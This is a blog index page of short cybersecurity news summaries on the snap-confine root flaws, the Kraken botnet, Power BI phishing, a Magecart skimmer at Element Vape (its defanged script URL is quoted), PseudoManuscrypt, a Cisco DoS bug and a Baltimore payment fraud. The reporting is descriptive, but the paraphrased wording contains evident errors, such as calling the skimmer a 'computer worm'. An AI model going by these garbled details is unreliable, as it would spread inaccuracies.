Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Vulnerabilities and Exploits
Linux Systems Root Privilege Security Researchers Vulnerabilities and Exploits

Several Vulnerabilities were Discovered in the Snap-Confine Function on Linux Systems

 

Security researchers from Qualys uncovered various flaws in Canonical's Snap software packaging and deployment system. Bharat Jogi, head of vulnerability and threat research at Qualys, revealed in a blog post that they discovered many vulnerabilities in the snap-confine function on Linux operating systems, "the most important of which can be abused to escalate privilege to gain root rights." 

Canonical created Snap, a software packaging and distribution mechanism for operating systems that use the Linux kernel. The packages, known as snaps, and the tool used to use them, snapd, are compatible with a variety of Linux distributions and enable upstream software developers to deliver their applications directly to users. Snaps are standalone applications that run in a sandbox and have mediated access to the host system. Snap-confine is a software that snapd uses internally to build the execution environment for snap applications. 

If this vulnerability is successfully exploited, any unprivileged user can get root privileges on the vulnerable system. Qualys security researchers were able to independently validate the vulnerability, create an exploit, and get full root access on default Ubuntu installations. Canonical cooperated in responsible vulnerability disclosure and coordinated with both vendor and open-source distributions to announce this newly identified vulnerability as soon as the Qualys Research Team confirmed it. 

Canonical, the publisher of Ubuntu, said in a statement that they tried to ensure that the subsystems on which the snap platform is based are utilised safely throughout the development process. They pointed out that, because of automatic refreshes, the majority of snap-distributed platform installations around the world have already been updated.

In addition, Qualys detected six more vulnerabilities. They detailed each vulnerability and asked all users to patch as soon as feasible. “Unfortunately, such a modern confinement platform involves many subsystems, and sometimes we make mistakes. Thankfully, Canonical and Ubuntu are part of a large community that includes competent security researchers. Recently, Qualys informed us that one of the tools a part of the snap platform contains a security issue,” a Canonical spokesperson said. 

“In their words: Discovering and exploiting a vulnerability in snap-confine has been extremely challenging (especially in a default installation of Ubuntu), because snap-confine uses a very defensive programming style, AppArmor profiles, seccomp filters, mount namespaces, and two Go helper programs,” the spokesperson added.
Read more »
Ukraine
Cyber Actors Data Breach DDOS Attacks Denial of Service vulnerability GRU Russian Hacker Ukraine

Russia Suspected of Espionage Against Ukraine Via Two Big Nations

 

On Friday, the White House suspected Russia of being behind recent cyberattacks on Ukraine's defense department and banking institutions. 

The statement by Anne Neuberger, the White House's top cyber official, was the most precise attribution of culpability for the cyber breaches which have occurred as tensions between Russia and Ukraine have risen. Although the attacks this week had a "limited impact" since Ukrainian officials were able to swiftly restore its networks, Neuberger believes hackers were laying the framework for future devastating invasions. 

As tensions between Russia and Ukraine rise, Britain has joined the United States in criticizing the GRU military intelligence agency for the widespread denial-of-service attacks. The strike, according to the British Foreign Office, "showed a persistent disdain for Ukrainian integrity." This is just another example of Russia's aggressive behavior toward Ukraine."

Russians may also be laying the foundations for more disruptive measures in the event of a Ukrainian invasion. Neuberger remarked, "We expect more destabilizing or damaging cyber action if Russia decides to continue its invasion of Ukraine, and we're working closely with friends and partners to guarantee to be prepared to call out the behavior and respond." 

The United States was publicly criticizing Russia because it needed to "call out the action swiftly." "The international community must be ready to expose harmful cyber operations and hold actors accountable for any disruptive or damaging cybersecurity threats," Neuberger added. 

The widespread breach of service attacks on Tuesday was described by Ukrainian officials as the deadliest in the country's history. However, while these certainly affected internet banking, hampered some government-to-public interactions, and were definitely intended to induce fear. "Typical DDoS attacks survive because the defenders are untrained," said Roland Dobbins, DDoS engineer at cybersecurity organization Netscout, adding that the most market mitigation technologies designed to resist such attacks are ineffective.
Read more »
surveillance
DDOS Attack Location data location tracking Mobile Hacking Mobile Security Smartphone surveillance

The Russian Expert Listed the Main Signs of Smartphone Surveillance

 

Along with the unconditional benefits, the smart devices around us also carry a number of dangers. Thus, with the help of a smartphone, attackers can gain access to the personal data of its owner. According to Evgeny Kashkin, associate professor of the Department of Intelligent Information Security Systems at RTU MIREA, there are several signs that may indirectly indicate that your smartphone has become a spy. 

"An important point, in this case, is the requirement for applications to use a camera, microphone, as well as access to data (images and videos) on the phone during installation. Of course, you can disagree with this point during the installation, but most likely, then the application will not work at all or will work incorrectly," the expert explains. 

According to him, for a number of applications, these access rights are mandatory for work, but there are applications where "such rights for normal operation are simply absurd." For example, a home internet account status application. 

Another important factor, in his opinion, is the use of geolocation in applications. At the same time, it`s not only about GPS, but also the use of cellular data, as well as connections to various web resources. Such an approach, on the one hand, can greatly facilitate the search for the right companies within walking distance in a number of search engines, but, on the other hand, the cell phone conducts a "total" tracking of your movements. The key question, in this case, is how the data will be used by those who collect it. 

A number of companies have gone even further in this context. They started tracking the email messages of the users. Thus, with the banal purchase of an electronic plane ticket, the system will notify you in advance of the departure date, and on the day of departure, it will build you a route to the airport, taking into account traffic jams. 

He also advises paying attention to the sudden and uneven loss of battery power. This may indicate that a malicious program is running in the background that can use the phone to carry out a DDOS attack. 

Another alarming symptom is the sudden freezing of the phone or even turning it off for no objective reason. And finally, the occurrence of noises and extraneous sounds during a conversation may also indicate that your phone is being monitored. 

Read more »
Windows
Bitcoins botnet Golang Crypto Hacking cryptocurrency Kraken malware Research Smokeloader Windows

New Golang Botnet Drains Windows Users’ Cryptocurrency Wallets

 

A new Golang-based botnet has been ensnaring hundreds of Windows PCs, each time its operators launch a new command and control (C2) server. This previously undiscovered botnet, dubbed Kraken by ZeroFox researchers in October 2021, utilizes the SmokeLoader backdoor and malware downloader to proliferate to new Windows systems. 

The botnet adds a new Registry key after compromising a new Windows device in order to accomplish persistence across system restarts. It also includes a Microsoft Defender exclusion to assure that its installation directory is never examined, and use the hidden attribute to hide its binary in Window Explorer. 

Kraken has a basic feature set that allows attackers to download and run additional malicious payloads on infected devices, such as the RedLine Stealer malware. RedLine is the most extensively used data thief, capable of gathering victims' passwords, browser cookies, credit card information, and cryptocurrency wallet information. 

ZeroFox stated, "Monitoring commands sent to Kraken victims from October 2021 through December 2021 revealed that the operator had focused entirely on pushing information stealers – specifically RedLine Stealer. It is currently unknown what the operator intends to do with the stolen credentials that have been collected or what the end goal is for creating this new botnet." 

The botnet, however, has built-in data-stealing skills and can steal cryptocurrency wallets before dropping other data thieves and cryptocurrency miners. Kraken can steal information from Zcash, Armory, Bytecoin, Electrum, Ethereum, Exodus, Guarda, Atomic, and Jaxx Liberty crypto wallets, according to ZeroFox. This botnet appears to be adding almost USD 3,000 to its masters' wallets every month, according to data obtained from the Ethermine cryptocurrency mining pool. 

The researchers added, "While in development, Kraken C2s seem to disappear often. ZeroFox has observed dwindling activity for a server on multiple occasions, only for another to appear a short time later using either a new port or a completely new IP."

Regardless, "by using SmokeLoader to spread, Kraken quickly gains hundreds of new bots each time the operator changes the C2."
Read more »
Threat actor
Cyber Security Microsoft Phishing Campaign sensitive credential Threat actor

PDC Discovered a Phishing Campaign that Spoofs Power BI Emails to Harvest Microsoft Credentials

 

The Cofense Phishing Defense Center (PDC) has discovered a new phishing effort that impersonates Power BI emails in order to steal Microsoft credentials. Power BI is a business intelligence-focused interactive data visualisation programme developed by Microsoft. It's a component of the Microsoft Power Platform. 

Power BI is a set of software services, apps, and connectors that work together to transform disparate data sources into coherent, visually immersive, and interactive insights. Data can be read directly from a database, a webpage, or structured files like spreadsheets, CSV, XML, and JSON. Power BI offers cloud-based BI (business intelligence) services known as "Power BI Services," as well as a desktop interface known as "Power BI Desktop."

It provides data warehouse functionality such as data preparation, data discovery, and interactive dashboards. Microsoft added a new service called Power BI Embedded to its Azure cloud platform in March 2016. The ability to import custom visualisations is a key differentiator of the product. 

The email appears to be a genuine Microsoft notification. There are a couple of reasons how this happens. Threat actors have grown accustomed to using authentic Microsoft notifications into their phishing designs. Researchers also saw them use stolen credentials to generate a legitimate-looking notification from a legitimate Microsoft instance. They noticed that the threat actor in this email employed a common theme to entice the recipient to click on the links. 

After clicking the link in the email, the user is taken to a website that appears to be a legitimate Microsoft log-in page. The first sign that anything is wrong with the page, aside from the lack of conventional imagery, is that the URL does not look anything like what is specified in the email or linked with Microsoft services. 

Following the recipient's input of their credentials, the attack concludes with an error message indicating that there was a problem with the account verification. This is yet another Microsoft spoof used by the threat actor to divert the recipient's attention away from the fact that they were not routed to the Power BI report they anticipated to view. This makes the recipient less likely to suspect that they have just given away their credentials. 

"Cofense continues to observe credential phishing as a major threat to organizations. This is why it’s critical to condition users to identify and report suspicious messages to the security operations team. Attacks such as this one are effective at eluding common email security controls, and are – by design — overlooked by end users," the company said.
Read more »
Online Retailers
Card Skimming Data Breach HTML Magecart Malicious actor Online Retailers

Credit Cards Were Forged from a Prominent e-Cigarette Store

 

Since being breached, Element Vape, a famous online retailer of e-cigarettes including vaping kits, is harboring a credit card skimmer on its website. In both retail and online storefronts in the United States and Canada, this retailer provides e-cigarettes, vaping equipment, e-liquids, and Synthetic drugs.
 
Its website Element Vape is uploading a potentially Malicious file from either a third-party website that appears to be a credit card stealer. Magecart refers to threat actors who use credit card cybercriminals on eCommerce sites by infiltrating scripts. 

On numerous shop webpages, beginning with the homepage, a mystery base64-encoded script may be seen on pages 45-50 of the HTML source code. For an unknown period of time, the computer worm has so far been present on ElementVape.com. 

This code was gone as of February 5th, 2022, and before, according to a Wayback Machine review of ElementVape.com. As a result, the infection appears to have occurred more recently, probably after the date and before today's detection. When decoded, it simply fetches the appropriate JavaScript file from a third-party site :

/weicowire[.]com/js/jquery/frontend.js

When this script was decoded and examined, it was apparent – the collection of credit card and invoicing information from clients during the checkout. The script looks for email addresses, payment card details, phone numbers, and billing addresses (including street and ZIP codes). 

The attacker acquires these credentials via a predefined Telegram address in the script which is disguised. The code also has anti-reverse-engineering features which check if it's being run in a sandbox or with "devtools" to prevent it from being examined.

It's unclear how the backend code of ElementVape.com was altered in the first place to allow the malicious script to enter. Reportedly, this isn't the first instance Element Vape's security has been breached. Users reported getting letters from Element Vape in 2018 indicating the company had a data breach so the "window of penetration between December 6, 2017, and June 27, 2018, might have revealed users" personal details to threat actors. 
Read more »
User Data
Bot Compromised Data Cryptbot Illegal Software Illegal spying malware PseudoManuscrypt attacks South Korea Spyware User Data

PseudoManuscrypt Malware Proliferating Similarly as CryptBot Targets Koreans

 

Since at least May 2021, a botnet known as PseudoManuscrypt has been targeting Windows workstations in South Korea, using the same delivery methods as another malware known as CryptBot. 

South Korean cybersecurity company AhnLab Security Emergency Response Center (ASEC) said in a report published, "PseudoManuscrypt is disguised as an installer that is similar to a form of CryptBot and is being distributed. Not only is its file form similar to CryptBot but it is also distributed via malicious sites exposed on the top search page when users search commercial software-related illegal programs such as Crack and Keygen."
  
According to ASEC, approximately 30 computers in the country are compromised on a daily basis on average. PseudoManuscrypt was originally discovered in December 2021, when Russian cybersecurity firm Kaspersky revealed details of a "mass-scale spyware attack campaign" that infected over 35,000 PCs in 195 countries around the world. 

PseudoManuscrypt attacks, which were first discovered in June 2021, targeted a large number of industrial and government institutions, including military-industrial complex firms and research in Russia, India, and Brazil, among others. The primary payload module has a wide range of spying capabilities, enabling the attackers virtually complete access over the compromised device. Stealing VPN connection data, recording audio with the microphone, and capturing clipboard contents and operating system event log data are all part of it. 

Additionally, PseudoManuscrypt can access a remote command-and-control server controlled by the attacker to perform malicious tasks like downloading files, executing arbitrary instructions, log keypresses, and capturing screenshots and videos of the screen. 

The researchers added, "As this malware is disguised as an illegal software installer and is distributed to random individuals via malicious sites, users must be careful not to download relevant programs. As malicious files can also be registered to service and perform continuous malicious behaviours without the user knowing, periodic PC maintenance is necessary."
Read more »
Vulnerabilities and Exploits
Cisco DoS Vulnerabilities email security Malicious Emails Vulnerabilities and Exploits

Malicious Emails have the Potential to Bring Down Cisco Email Security Appliances

 

Cisco notified customers this week that its Email Security Appliance (ESA) product is vulnerable to a high-severity denial of service (DoS) vulnerability that may be exploited using specially crafted emails. The CVE-2022-20653 vulnerability affects the DNS-based Authentication of Named Entities (DANE) email verification component of Cisco AsyncOS Software for ESA. It is remotely exploitable and does not require authentication. 

This vulnerability is caused by the software's insufficient error handling in DNS name resolution. An attacker could take advantage of this flaw by sending specially crafted email messages to a device that is vulnerable. A successful exploit could allow the attacker to make the device unavailable from management interfaces or to process additional email messages for a period of time until the device recovers, resulting in a denial of service (DoS) issue. Repeated attacks could render the gadget fully inoperable, resulting in a persistent DoS condition, said the company. 

This vulnerability affects Cisco ESA devices running a vulnerable version of Cisco AsyncOS Software with the DANE functionality enabled and downstream mail servers configured to deliver bounce messages. 

Customers can prevent exploitation of this vulnerability by configuring bounce messages from Cisco ESA rather than downstream reliant mail servers. While this workaround has been deployed and confirmed to be functional in a test environment, users should evaluate its relevance and efficacy in their own environment and under their own use conditions. Customers should be aware that any workaround or mitigation deployed may have a negative impact on network functioning or performance due to inherent customer deployment circumstances and limitations.

"Cisco has released free software updates that address the vulnerability described. Customers with service contracts that entitle them to regular software updates should obtain security fixes through their usual update channels. Customers may only install and expect support for software versions and feature sets for which they have purchased a license," the company said. 

Cisco has given credit to numerous persons who worked with the Dutch government's ICT services company DICTU for reporting the security flaw. According to the networking behemoth, there is no evidence of malicious exploitation. 

Cisco also issued two advisories this week, informing users of medium-severity issues impacting Cisco RCM for Cisco StarOS software (DoS vulnerability), as well as Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (XSS vulnerability).
Read more »
Phishing and Spam
Cyber Security cybercriminals Job Scam Linkedin malacious Phishing and Spam

Giant User Theft and Bot Attacks Target on Job Seekers

 

Job seekers are viable targets for social manipulation efforts because applicants are emotionally weak and eager to provide any information to help them win the job. Cybercriminals are finding it easier to find the next victim now the "Great Resignation" is in full armor. 

A job posting portal with a location in six countries was the sufferer in this instance. The goal of the attack was to collect job seeker information from the website. 

Since February 1, experts have seen a 232 percent increase in phishing email attacks imitating LinkedIn, seeking to deceive job seekers into handing up private credentials. The emails contained subject lines including "Searching for a suitable candidate online," "You mentioned in 4 searches this week," and even "You have 1 new message," as per the Egress team. 

The OWASP Foundation classifies web scraping as an operational threat (OAT-011), which is defined as gathering accessible data or processing output from an application. While web scraping walks a delicate line among reporting and data privacy violations, it is still one of the most common automated hacks affecting businesses today, according to Imperva.

Imperva didn't name the company, but it said it received 400 million bot requests from 400,000 network Interfaces over four days in an attempt to harvest all of its job seekers' information. Similar strategies can be employed in "scalping" attacks, which are aimed to purchase in-demand, limited-edition products in order to resell them at a greater price later. Imperva neutralized one such operation on a retailer's website around Black Friday week, which had nine million bot queries in only 15 minutes — 2500 percent above its normal traffic rate.

Several people are accustomed to receiving regular authentic LinkedIn communications – and may unintentionally click without double-checking. Individual users are still responsible for being aware of the data they provide socially and how it can be used to deceive users into clicking a malicious link.
Read more »
User Security
Advertisements Apple Cross App Tracking Cyber Security Facebook Google Privacy Privacy Sandbox User Data User Privacy User Security

Google Announces Privacy Sandbox on Android to Restrict Sharing of User Data

 

Google announced on Wednesday that it will extend its Privacy Sandbox activities to Android in an effort to broaden its privacy-focused, but less disruptive, advertising technologies beyond the desktop web. To that aim, Google stated it will work on solutions that prohibit cross-app tracking, similar to Apple's App Tracking Transparency (ATT) framework, essentially restricting the exchange of user data with third parties as well as removing identifiers like advertising IDs from mobile devices. 

Anthony Chavez, vice president of product management for Android security and privacy, stated, "The Privacy Sandbox on Android builds on our existing efforts on the web, providing a clear path forward to improve user privacy without putting access to free content and services at risk." 

Google's Privacy Sandbox, which was announced in 2019, is a collection of technologies that will phase out third-party cookies and limit covert monitoring, such as fingerprinting, by reducing the number of information sites that can access to keep track of users online behavior. 

The Alphabet Inc. company, which makes the majority of its revenue from advertising, says it can safeguard phone users' data while still providing marketers and app developers with new technology to deliver targeted promotions and measure outcomes. According to Anthony Chavez, vice president of product management for Android Security & Privacy, the proposed tools for the Android mobile operating system would limit the app makers' ability to share a person's information with third parties and prohibit data monitoring across several apps. Google stated the tools would be available in beta by the end of 2022, followed by "scaled testing" in 2023. Chavez said in an interview that the best path forward is an approach “that improves user privacy and a healthy mobile app ecosystem. We need to build new technologies that provide user privacy by default while supporting these key advertising capabilities." 

Google is aiming to strike a balance between the financial needs of developers and marketers and the expanding demands of privacy-conscious consumers and regulators. The company is gathering feedback on the proposal, similar to how its Privacy Sandbox effort is gradually building a new online browsing privacy standard. Google's initial idea was met with derision from UK authorities and lawmakers, but the corporation has subsequently proposed serving adverts based on themes a web user is interested in that are erased and replaced every three weeks. 

Meta Platforms Inc., the parent company of Facebook, has been at odds with Apple over the company's App Monitoring Transparency tool, which allows iPhone users to turn off tracking across all of their apps. According to executives, Google's YouTube has taken a minor financial hit as a result of the technology. In other words, it makes it more difficult for marketers to verify whether their iPhone advertising was effective. 

According to Chavez, the Android Privacy Sandbox would enable tailored advertising based on recent "topics" of interest, and enable attribution reporting, which will tell marketers if their ad was effective.
Read more »
Threat actor
Baltimore Cyber Crime Email Hacking Phishing Attack Threat actor

Baltimore City was Duped Out of $376K

 

A new report from the Office of the Inspector General (OIG) reveals that a cyber-criminal posing as a vendor duped Baltimore city out of hundreds of thousands of dollars last year. In October 2021, the OIG initiated an investigation after obtaining information from Baltimore's Bureau of Accounting and Payroll Services (BAPS) about an alleged fraudulent Electronic Funds Transfer (EFT). The Mayor's Office of Children and Family Success (MOCFS) issued the Vendor with EFT payment funds.

BAPS and MOCFS were contacted by email on December 22, 2020 and January 7, 2021, from an email address linked with an employee of the Vendor firm, asking for a change to its EFT remittance details. On December 16, 2020, the email linked with the Vendor Employee sent BAPS a Vendor Payment & Electronic Funds Transfer Form. 

The OIG later determined that the Vendor Employee's email account had been hacked by a malicious actor who had set up rules within the Vendor Employee's email account as a result of a phishing assault. As a result, the malicious actor was able to correspond with City workers without the Vendor's awareness. 

On January 5, 2021, the fraudster contacted MOCFS and BAPS once more, this time requesting that the funds be transferred to a new account at a third financial institution. As verification, the fraudster sent a bank letter and a copy of a voided check with the same details as the third account. BAPS paid $376,213.10 into the third account on January 7, 2021, believing the fraudster's assertions. 

The OIG discovered that BAPS employees do not have access to a list of authorized signatories for vendors and must rely on the information given by representatives from City agencies. Furthermore, instead of independently validating information and requests, BAPS relied on MOCFS to assist the request and accepted an incoming phone call from someone pretending to be the Vendor's Chief Financial Officer. 

In his response to this report, Director of Finance Henry Raymond notified the OIG that new protocols had been implemented requiring Department of Finance (DOF) workers to independently verify bank changes with an executive-level employee. DOF has also devised processes to exclude City agencies from vendor accounting procedures.
Read more »
Subscribe to: Comments (Atom)